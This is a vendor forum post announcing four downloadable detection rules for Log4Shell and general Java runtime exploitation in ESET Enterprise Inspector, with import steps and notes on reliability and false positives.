ESET Moderators TomasP 319 Posted December 16, 2021 ESET Moderators Posted December 16, 2021 Hello everyone, The recently discovered Log4j remote code execution vulnerability has affected organizations, ESET customers and their IT teams around the globe and as cybersecurity professionals we need to ensure their safety. Our Research & Threat Analysis team has responded rapidly and done a great job of creating a package of 4 rules for detection of Log4j exploitation and more general Java runtime exploitation. We advise to import these rules (the import procedure is very simply done from the Admin -> Detection Rules -> Import section of EEI as described here). These rules will also be included in the upcoming hotfix for EEI 1.6, but we are making them available to you: Possible Log4Shell (CVE-2021-44228) exploitation [D0532a] Possible Log4Shell (CVE-2021-44228) exploitation [D0532b] Potential Java Runtime exploitation [E0461] Java Runtime executing suspicious script/command interpreter [E0462] The first two rules are designed to detect the exploit itself so the false positives count should be absolutely minimal. However, these rules are using an experimental feature of EEI which is not currently fully supported, so the detection may not work in 100% of cases. E.g. when there is a detection already reported on the network layer, rule in EEI will not be triggered (but in this case you should have detection from at least one source and protection is in place). Because of the way how the feature is implemented it is more reliable when executed as re-run task for a retrospective threat hunt. The last two rules are focused on more general types of cases, general exploitation of Java Runtime i.e. not only by CVE-2021-44228. That means that those rules may generate occasional false positives for the cases when some legitimate Java application is executing system components which may indicate an attacker's activity. We have tested these rules to not have an excess number of false positives, but in case you will observe unusual amount of FPs in your environments - please report them back to us. The rule pack itself can be found here. Thank you. MichalJ and JamesR88 2
Recommended Posts